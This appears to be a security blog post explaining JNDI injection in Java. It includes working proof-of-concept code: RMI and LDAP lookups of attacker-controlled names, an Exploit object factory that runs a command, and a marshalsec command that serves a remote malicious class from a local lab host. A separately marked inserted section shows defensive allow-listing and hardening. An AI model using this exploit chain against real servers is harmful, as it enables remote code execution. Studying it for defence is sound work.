@Author: Patrilic @Time: 2020-3-15 16:41:55
JNDI (Java Naming and Directory Interface)
is the naming and directory interface provided by Java.
JNDI is an API that lets a client discover and look up data and objects by name.
```java
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.sql.DataSource;

// JNDI name
String jndiName = ...;
// Initial context
Context context = new InitialContext();
// look up the data bound to that name
DataSource ds = (DataSource) context.lookup(jndiName);
```
JNDI injection: if we can control the value of jndiName arbitrarily,
we can make JNDI load a remote Class and execute it.
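As an added defensive example (not part of the original post), the following Java class shows how an application should treat a lookup name that can be influenced by user input: the name is checked against a strict allow-list of container-local `java:comp/env/` names before it reaches `InitialContext.lookup()`, so URL names such as the `rmi://` and `ldap://` ones used in the PoCs below are never handed to a URL context factory. As defence in depth it also sets the JDK's `trustURLCodebase` properties to `false`, which stops the RMI/LDAP/CORBA naming providers from loading factory classes from a remote codebase. The class name `SafeJndiLookup`, the allowed prefix and the sample names are assumptions for illustration.

```java
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.util.regex.Pattern;

// Hypothetical wrapper class; not from the original post.
public class SafeJndiLookup {

    // Allow-list: only names inside the container's local environment naming
    // context, made of plain path characters. Any "<scheme>:" form other than
    // the fixed "java:" prefix cannot match this pattern.
    private static final Pattern SAFE_NAME =
            Pattern.compile("^java:comp/env/[A-Za-z0-9_./-]+$");

    // Returns true only for names that may be passed to lookup().
    public static boolean isSafeName(String jndiName) {
        return jndiName != null
                && SAFE_NAME.matcher(jndiName).matches()
                && !jndiName.contains("..");   // no climbing out of java:comp/env/
    }

    // Performs the lookup only after the name has passed the allow-list.
    public static Object lookup(String jndiName) throws NamingException {
        if (!isSafeName(jndiName)) {
            throw new NamingException("refusing JNDI lookup of untrusted name: " + jndiName);
        }
        Context ctx = new InitialContext();
        try {
            return ctx.lookup(jndiName);
        } finally {
            ctx.close();
        }
    }

    // Defence in depth: these are the system properties the JDK's RMI, LDAP and
    // CORBA naming providers consult before loading an object factory from a
    // remote codebase. Setting them to "false" explicitly removes any dependence
    // on the JDK build's default.
    public static void hardenJvm() {
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "false");
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "false");
        System.setProperty("com.sun.jndi.cosnaming.object.trustURLCodebase", "false");
    }

    public static void main(String[] args) {
        hardenJvm();
        // Constructed sample names, including the two PoC names from the post.
        String[] samples = {
            "java:comp/env/jdbc/appDb",       // allowed
            "rmi://127.0.0.1:1099/Exploit",   // rejected: remote RMI reference
            "ldap://127.0.0.1:1389/Exploit",  // rejected: remote LDAP reference
            "java:comp/env/../../Exploit",    // rejected: traversal out of the ENC
        };
        for (String s : samples) {
            System.out.println(s + " -> " + (isSafeName(s) ? "allowed" : "rejected"));
        }
    }
}
```

The allow-list is the control that matters: the `trustURLCodebase` properties only block remote class loading, while a lookup against an attacker-chosen RMI or LDAP server can still return a reference that the application deserializes, so the name itself must never be attacker-controlled.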
RMI factory class: com.sun.jndi.rmi.registry.RegistryContextFactory
poc.java
```java
package com.patrilic.jndipoc;

import javax.naming.Context;
import javax.naming.InitialContext;

public class poc {
    public static void main(String[] args) throws Exception {
        // the name resolved here is a remote RMI reference
        String uri = "rmi://127.0.0.1:1099/Exploit";
        Context ctx = new InitialContext();
        ctx.lookup(uri);
    }
}
```
Exploit.java
```java
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.IOException;
import java.util.Hashtable;

public class Exploit implements ObjectFactory {
    // called by the naming manager when the reference is resolved
    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx,
                                    Hashtable<?, ?> environment) {
        exec("xterm");
        return null;
    }

    // the cmd argument is unused; the hard-coded Calculator path runs regardless
    public static String exec(String cmd) {
        try {
            Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (IOException e) {
            e.printStackTrace();
        }
        return "";
    }

    public static void main(String[] args) {
        exec("123");
    }
}
```
Using marshalsec
Start an RMI server:
```shell
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1:8001//#Exploit
```
Call chain
javax/naming/InitialContext.java
com/sun/jndi/toolkit/url/GenericURLContext.class
com/sun/jndi/rmi/registry/RegistryContext.class
Communicates with the registry and obtains the IP of the RMI service.
Then goes straight into help.loadClass()
LDAP factory class: com.sun.jndi.ldap.LdapCtxFactory
poc.java
```java
package com.patrilic.jndipoc;

import javax.naming.Context;
import javax.naming.InitialContext;

public class poc {
    public static void main(String[] args) throws Exception {
        // the name resolved here is a remote LDAP reference
        String uri = "ldap://127.0.0.1:1389/Exploit";
        Context ctx = new InitialContext();
        ctx.lookup(uri);
    }
}
```
As before, it first goes through javax/naming/InitialContext.java#lookup
ldap is handled in com/sun/jndi/url/ldap/ldapURLContext.class
com/sun/jndi/toolkit/url/GenericURLContext.class
com/sun/jndi/ldap/LdapCtx.class
Finally the class is overridden and the command is executed in
javax/naming/spi/DirectoryManager.java